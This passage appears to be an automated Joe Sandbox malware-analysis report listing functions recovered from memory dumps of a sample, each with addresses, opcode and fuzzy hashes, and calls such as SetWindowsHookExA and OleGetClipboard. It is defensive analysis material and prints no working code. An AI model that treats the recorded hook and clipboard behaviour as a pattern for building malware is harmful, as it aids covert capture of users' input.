Instruction Fuzzy Hash: 45910574D00208CFEB54DFA8C848BDDBBB1FF49314F209269E509AB2A1DB759985CF64

Function 00E85362 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03759426ff98c01bb760ef3467dde2baf33b56f5728e65c9cd9acb4a4488a76
Instruction ID: 79588c495817c615d38be46ce65f36e7a71d1d2c8730a53100d31881956b0fc9
Opcode Fuzzy Hash: d03759426ff98c01bb760ef3467dde2baf33b56f5728e65c9cd9acb4a4488a76
Instruction Fuzzy Hash: 5891A375E00618CFDB18DFAAD884A9DBBF2BF89300F149069E419BB365DB349945CF50

Function 00E8D278 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37897a35e8bb8b18094bf01023d21f369edfbc8076c9b8b0f2e5383d014b656
Instruction ID: 9291454ba2be7cf5a1369eced199d27b4d899ef0d170edbe931e21764fca77cf
Opcode Fuzzy Hash: a37897a35e8bb8b18094bf01023d21f369edfbc8076c9b8b0f2e5383d014b656
Instruction Fuzzy Hash: 13819374E04218CFEB14DFAAD884A9DBBF2BF89304F249069E419BB365DB349945CF50

Function 00E8CCD8 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0439a98e4982bb64c49436a30d304e7becf8a6eb450aef5ca74677c3bf2686
Instruction ID: 32e0cd2954e6d7fbbe37546fb6d9ac0843537914c541b40b217fc01c92dd1290
Opcode Fuzzy Hash: 6e0439a98e4982bb64c49436a30d304e7becf8a6eb450aef5ca74677c3bf2686
Instruction Fuzzy Hash: 9481A474E00218CFEB14DFAAD884A9DBBF2BF89304F249069E419BB365DB345945CF60

Function 00E8CFA9 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef980a301b7a5199c3efb1b5836eb2fee913d2a20dae77c6b1980615322a482
Instruction ID: b4bf907363900a4c3b18786152a123a290ae53f487ad4aa02b69d9ac50309182
Opcode Fuzzy Hash: 9ef980a301b7a5199c3efb1b5836eb2fee913d2a20dae77c6b1980615322a482
Instruction Fuzzy Hash: 9381A374E05218CFEB14EFAAD884A9DBBF2BF89300F149069E419BB365DB349945CF50

Function 00E8C738 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c5ced9daa8e136ede16838afe4ea08239f980f04d9eb2915ac13dd0d94ca17
Instruction ID: 099280249c19c7c645f5e7f204c78348c164362c94cd42b8cd2c1a58da1af131
Opcode Fuzzy Hash: 17c5ced9daa8e136ede16838afe4ea08239f980f04d9eb2915ac13dd0d94ca17
Instruction Fuzzy Hash: AF818374E00218CFDB18DFAAD984A9DBBF2BF89304F249069E419BB365DB345945CF50

Function 00E8CA08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce6fd2fe9c97fade44760905f89b4ef40389aa3795109d7db9051f6036d15958
Instruction ID: e984fec1e66b82fe4eb89a6681bcf1c71f186c8be8092ed5fb90dc8d8c0174c2
Opcode Fuzzy Hash: ce6fd2fe9c97fade44760905f89b4ef40389aa3795109d7db9051f6036d15958
Instruction Fuzzy Hash: 75818474E00618CFDB14DFAAD884A9DBBF2BF89304F249069E419BB365DB349945CF50

Function 00E8E97B Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39b5feefc7a3ca1fce4df1dae399fd34ae9586f5869064f7ef74289e479111b
Instruction ID: 0cb381334dde0306c6e137a416b8b9a23b955f84350dfb1e314fee3e5251aa54
Opcode Fuzzy Hash: b39b5feefc7a3ca1fce4df1dae399fd34ae9586f5869064f7ef74289e479111b
Instruction Fuzzy Hash: 6C51A474E00208DFDB18DFAAD894A9DBBB2BF89700F249169E819BB364DB315841CF54

Function 00E8E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7123ce62af5354c649d2bb2c5f75e682398c7e7a2d25e45c75b6a526a6549d
Instruction ID: aa053aff0c1dd49b8b839582d85f69d824fa62e7d403c1d6e619a44061252419
Opcode Fuzzy Hash: 5b7123ce62af5354c649d2bb2c5f75e682398c7e7a2d25e45c75b6a526a6549d
Instruction Fuzzy Hash: 99518575E00208DFDB18DFAAD894A9DBBB2BF89700F249169E819BB364DB315841CF54

Function 00B44E39 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c62e851785290c290d3b5c16bba61000e555e817db41ed498689a0115e9f6ce
Instruction ID: 7b0893eec242e57c4012bb1eea7a0f44eed601f0aa23c23c54c8e910c48442c5
Opcode Fuzzy Hash: 2c62e851785290c290d3b5c16bba61000e555e817db41ed498689a0115e9f6ce
Instruction Fuzzy Hash: 37311270E052198FDB04DFA4C8447EEBBF2BF4A310F1455AAE000BB291D7798E45CBA0

Function 00B44E48 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042ecc081ddb184535922b308bd2e7b6adafabb4ccd466db1473bce2310455f7
Instruction ID: aaf7a15cc122d182fb1005e7a576ddfa6c70c7fa4afbb4013ca79775b56c832f
Opcode Fuzzy Hash: 042ecc081ddb184535922b308bd2e7b6adafabb4ccd466db1473bce2310455f7
Instruction Fuzzy Hash: A231EF70E012199FDB04DFA5C444BEEBBF2BB49310F105569E414B7290DB799E85CBA4

Function 00B42AC1 Relevance: 6.1, APIs: 4, Instructions: 144
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B42B4E
GetCurrentThread.KERNEL32 ref: 00B42B8B
GetCurrentProcess.KERNEL32 ref: 00B42BC8
GetCurrentThreadId.KERNEL32 ref: 00B42C21

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ac8755a1e510928d80324d78e919b74e1a1654dece042f52a660d6f541d31b20
Instruction ID: 5dd86d3c220145ef08447d4910f36982aad9a2cb56e5b2870f0fcce681a0afc6
Opcode Fuzzy Hash: ac8755a1e510928d80324d78e919b74e1a1654dece042f52a660d6f541d31b20
Instruction Fuzzy Hash: CD5189B0900749CFDB14DFA9D448B9EBBF1EF48304F24849AE409AB362DB755944CB66

Function 00B42AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B42B4E
GetCurrentThread.KERNEL32 ref: 00B42B8B
GetCurrentProcess.KERNEL32 ref: 00B42BC8
GetCurrentThreadId.KERNEL32 ref: 00B42C21

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5ce9f1651bd8f7e2df1c6e89695856870d5dd5f25eeccba596aac8a9940e4963
Instruction ID: aed4dc477c6e51b40b210e5c320e2cbbce1fbc2511e2244d419aeb33bdbc7f91
Opcode Fuzzy Hash: 5ce9f1651bd8f7e2df1c6e89695856870d5dd5f25eeccba596aac8a9940e4963
Instruction Fuzzy Hash: BE5158B0900709CFEB14DFAAD548BAEBBF1EF48304F248499E409A7361D7749944CF66

Function 00B4298C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00B43BD1

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6f8505582b4ec92b612b94e15fc81b04deea1b7e2cb91bab3ce2043f01bc4512
Instruction ID: 8259010ef9762bcca9446c152ff3c3260c4df6e571fa19e9a1131ea768ef1dd6
Opcode Fuzzy Hash: 6f8505582b4ec92b612b94e15fc81b04deea1b7e2cb91bab3ce2043f01bc4512
Instruction Fuzzy Hash: 2D414AB4900309DFDB14CF99C488BAABBF5FB88710F28C499D519AB321D375A941DFA1

Function 00F821E2 Relevance: 1.6, APIs: 1, Instructions: 80
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32 ref: 00F82245

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 4471de1f8f0dcf8e7d15c51fe8befc45a86eb89a72fb9b29e5218da34617914f
Instruction ID: eec7a83a9b821c6aca6ce7cbde1110e369c0c674278db9c0c7c64b83cc39030f
Opcode Fuzzy Hash: 4471de1f8f0dcf8e7d15c51fe8befc45a86eb89a72fb9b29e5218da34617914f
Instruction Fuzzy Hash: 373165B1C04649CFDB20DFAAD448BDEFBF0AF48324F24855AD558A3252C378A545CFA6

Function 00F82DCC Relevance: 1.6, APIs: 1, Instructions: 75
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 00F82E60

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: a03bf4bbfca09ad7a826d0d020762d5a1bf30eeb7e1e2cff5084eef7ac3a700e
Instruction ID: ad7e2f9ccf831855f2bf0e9e8d4f0aff17da37119cd6e3c4b6023a0866739462
Opcode Fuzzy Hash: a03bf4bbfca09ad7a826d0d020762d5a1bf30eeb7e1e2cff5084eef7ac3a700e
Instruction Fuzzy Hash: C031F0B0D01248DFDB10DFA9D984BDDBBF1AF48314F248059E404AB390DBB5A945CF55

Function 00F828AC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 00F82E60

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 89ea82b905a47fa00daa468589459b75321f6d96517c4b1a3dd8408d4e40309b
Instruction ID: b365c3e3790129b53e7f69c15c5eb983391a97c8a28b958c4e3cd8f27b3002d1
Opcode Fuzzy Hash: 89ea82b905a47fa00daa468589459b75321f6d96517c4b1a3dd8408d4e40309b
Instruction Fuzzy Hash: DB31E2B0D01248EFDB54DF99D584BDDBBF5AF48314F248019E404BB390DBB5A845CB65

Function 00B43D40 Relevance: 1.6, APIs: 1, Instructions: 66
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,?,?,?), ref: 00B43DCD

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 8f80435068e71f9386ef6b307eeb4c347a18b4f22b9ea0c3a969cbddbe83fd46
Instruction ID: 42a3aacb8e4edc76eca41b87434395b3e31e95737c9b9373234092abd9f57026
Opcode Fuzzy Hash: 8f80435068e71f9386ef6b307eeb4c347a18b4f22b9ea0c3a969cbddbe83fd46
Instruction Fuzzy Hash: 0F21A175C093888FCB11CF99D845BDEBFF4EB0A710F19448AD444A7252C3756948CFA1

Function 00B40F0C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B42CDE,?,?,?,?,?), ref: 00B42D9F

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eabfbcd1e651e33e2b1fdaa5819ffa797d44a2657a3753e503b62f74ab596f69
Instruction ID: e13762e4306e6939cf4f27b23145b77c439693d432c587b81cc2f41b59099fae
Opcode Fuzzy Hash: eabfbcd1e651e33e2b1fdaa5819ffa797d44a2657a3753e503b62f74ab596f69
Instruction Fuzzy Hash: C721E6B5D00248DFDB10CFAAD484AEEBBF4FB48310F14846AE914A7310D374A944DFA5

Function 00B42D12 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B42CDE,?,?,?,?,?), ref: 00B42D9F

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d39734709a06d85df801d6decd80022ad5710628310ac94299318b04bf15aceb
Instruction ID: a5a8fd5d13c2ae72e7ba217fb3c1f86b3191fefc6f645bc0e3393c2352448fed
Opcode Fuzzy Hash: d39734709a06d85df801d6decd80022ad5710628310ac94299318b04bf15aceb
Instruction Fuzzy Hash: 282103B5900208AFDB10CFAAD884ADEBBF8FB48310F14801AE958A3350C374A940CF65

Function 0659992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06599A6E

Memory Dump Source

Source File: 00000007.00000002.3906684361.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6590000_EUYIlr7uUX.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c2e1e153fc083ed2c0d386f77c22878d63c7f0da12c51bcef9313faf5794134
Instruction ID: a41283fec747a655b5e14f63a7e54c8c6338aca94350878dc011730c668f062a
Opcode Fuzzy Hash: 8c2e1e153fc083ed2c0d386f77c22878d63c7f0da12c51bcef9313faf5794134
Instruction Fuzzy Hash: 11116A74E042098FEF48DFA9D884AADBBB5FB88315F188169E804A7241DB749D41CB60

Function 00B44C51 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00B44CD3

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 53f4f7b21650ca9ade59e175052d0bdc6c66bc9dc605d2c9d7e36e15187f88de
Instruction ID: eef42650e465877cd2ffc76e2fe547bb4104f0d18a5802035864494415a95709
Opcode Fuzzy Hash: 53f4f7b21650ca9ade59e175052d0bdc6c66bc9dc605d2c9d7e36e15187f88de
Instruction Fuzzy Hash: F82112B59002499FDB14CFAAD884BEEBBF5EB88310F14841AD419A7250C775A944CFA1

Function 00B44C58 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 00B44CD3

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8f398afed05dab3b825d95c5fc48131c3ef48d24a686e14ceca997525f4aabd9
Instruction ID: 6e61799ee7ae865f54b4201190c0a6a1ad223b410f1aabaa95932f54bb03b996
Opcode Fuzzy Hash: 8f398afed05dab3b825d95c5fc48131c3ef48d24a686e14ceca997525f4aabd9
Instruction Fuzzy Hash: 9A21E2B5900209DFDB14DFAAD844BEEBBF5FB88310F14842AD419A7250CB75A944CFA5

Function 00F80DA8 Relevance: 1.6, APIs: 1, Instructions: 51
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32 ref: 00F80E05

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 07ba4feeccb7ab0e7044688bc5c4345dc7981f2478a2c87dca7c0550f491c3d5
Instruction ID: 69f8178108ef2d59bb89801d6ce1dcad3ba9325f63d2b7170ba302dc1218b215
Opcode Fuzzy Hash: 07ba4feeccb7ab0e7044688bc5c4345dc7981f2478a2c87dca7c0550f491c3d5
Instruction Fuzzy Hash: 4B1158B5804388CFDB21CFA9D444BDEBFF4AB49310F14885AD059A7252C378A848CFA2

Function 00F82270 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 00F82245

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: f49ba9e5d630ceba424c328ec21dd217080b8f7f9de15323c716e545341c5923
Instruction ID: 227c992768b2da5e29c44d3667e3de2642098ac42a01268086bcf9ee5eff54c6
Opcode Fuzzy Hash: f49ba9e5d630ceba424c328ec21dd217080b8f7f9de15323c716e545341c5923
Instruction Fuzzy Hash: 59018CB1E09340CFEB55DF98E814BDABBF0AF49324F18848ED069A7252C335A905CF61

Function 00B43D70 Relevance: 1.5, APIs: 1, Instructions: 44
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,?,?,?), ref: 00B43DCD

Memory Dump Source

Source File: 00000007.00000002.3888726401.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b40000_EUYIlr7uUX.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 7b9f25d675d64283b2b496fbc9f9587ab9af3fd3d31ce1026051d125a53edd69
Instruction ID: 42cf64d573af09d64945543f5e599a8beaf0e8d3674fc8d683adf4da4be3d06a
Opcode Fuzzy Hash: 7b9f25d675d64283b2b496fbc9f9587ab9af3fd3d31ce1026051d125a53edd69
Instruction Fuzzy Hash: 6211D0B5800749DFDB20DF9AD885BDEBBF8EB48720F14845AE559A7200C375AA44CFA1

Function 00F821E8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 00F82245

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 5729ef6d67c0b7536f0d2b865aa32fe61e071b8b96f4106ff222cd9d38cd9fd1
Instruction ID: 1c4cb9dcecab5c282915a0eaa1ed6a937985b3fcf5251c71235239a0e94945bf
Opcode Fuzzy Hash: 5729ef6d67c0b7536f0d2b865aa32fe61e071b8b96f4106ff222cd9d38cd9fd1
Instruction Fuzzy Hash: FC11DDB5C00649DFDB24DF9AE844BDEFBF4EB48324F10842AD529A7610D378A544CFA5

Function 00F80DB0 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 00F80E05

Memory Dump Source

Source File: 00000007.00000002.3891153695.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f80000_EUYIlr7uUX.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a8acd941f6c9de432c7e0471a23695bbecfd4d925c3c969504822266fae797e8
Instruction ID: f7351040c5e6cf8e1e122583ba40772723ebb9f6732811269b8ac8e6c151bbd8
Opcode Fuzzy Hash: a8acd941f6c9de432c7e0471a23695bbecfd4d925c3c969504822266fae797e8
Instruction Fuzzy Hash: 8B1112B5800348CFDB20DF9AD444BCEBBF8AB48324F208819D518A7200C378A944CFA5

Function 00E8AEF0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

3, xrefs: 00E8AED8

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: f46d21f52535f6cecd62aad6e1f74c6f680ca64ad84029cb048d98c5adab010d
Instruction ID: fe85adf40ee49f103b829534dfd482d12ac72cace79a25eb991f73346fa719a5
Opcode Fuzzy Hash: f46d21f52535f6cecd62aad6e1f74c6f680ca64ad84029cb048d98c5adab010d
Instruction Fuzzy Hash: E5412572B042148FDB05AB68D8447AE77E2EBCC710F18447AE51EE7391DF318D468B91

Function 00E8E007 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7355b665f08186856a017ded029af5cb768c38a888e941942903fd0b3707b4e8
Instruction ID: 036419e69e5fab984d5637f317adb555d1d361c1e899c8518e7d922452d28d4d
Opcode Fuzzy Hash: 7355b665f08186856a017ded029af5cb768c38a888e941942903fd0b3707b4e8
Instruction Fuzzy Hash: 5812BD348A13428FD2646F28E7AC17ABB71FB1F3237466C01E50BD0955DF31A4AE8B61

Function 00E8E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592ba33eb827db6d502a36058a279558e199c02eb5de70f9126c90f6bc909c81
Instruction ID: 7412ac581f0a4be9e29ecfa50220387c7ea125e9f620e870995c1efe7ef5af10
Opcode Fuzzy Hash: 592ba33eb827db6d502a36058a279558e199c02eb5de70f9126c90f6bc909c81
Instruction Fuzzy Hash: 3C12BE348A13528FD2646F28E7AC17ABB71FB1F3137466C01E50BD0955DF31A4AE8E61

Function 00E80C8F Relevance: .5, Instructions: 544COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032817d9c54d918a9044c9c6887e99ad6918c40836e05e43dbb6ce64669277ed
Instruction ID: bc0ab13cc018e28e379b0c7d51053ef71b0543ccf41031b7899cf950735e5a0c
Opcode Fuzzy Hash: 032817d9c54d918a9044c9c6887e99ad6918c40836e05e43dbb6ce64669277ed
Instruction Fuzzy Hash: 2052CA7890021ACFCB54EF68E984B9EB7B2FF89701F1085A5D409A7359EB316D86CF50

Function 00E80CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3a058c3266f18d0e9979ee4d93c6dea1380ef91843a57cd9c9f24602456404
Instruction ID: 2617ec9701635c09c19330dbedf4a3793eeb28379d1f7751f81024600e7b9045
Opcode Fuzzy Hash: cd3a058c3266f18d0e9979ee4d93c6dea1380ef91843a57cd9c9f24602456404
Instruction Fuzzy Hash: D152BA7890021ACFCB54EF68E994B9EB7B2FB89701F1085A5D409A7358EB316D86CF50

Function 00E876F1 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3890816072.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e80000_EUYIlr7uUX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0eb3b22a925fcacd62f4cae6d236eaa21cf687d391bdc2409e6d3fd80beec0d
Instruction ID: efee0e25f2fb0b67704c4d78318b05ed1c6304beb9c9d22e5421ae5bac7b156f
Opcode Fuzzy Hash: e0eb3b22a925fcacd62f4cae6d236eaa21cf687d391bdc2409e6d3fd80beec0d
Instruction Fuzzy Hash: F5124E30A04609CFCB14DF68D984A9EBBF2FF89714F259599E88DAB261D730ED41CB50

Function 00E85F38 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

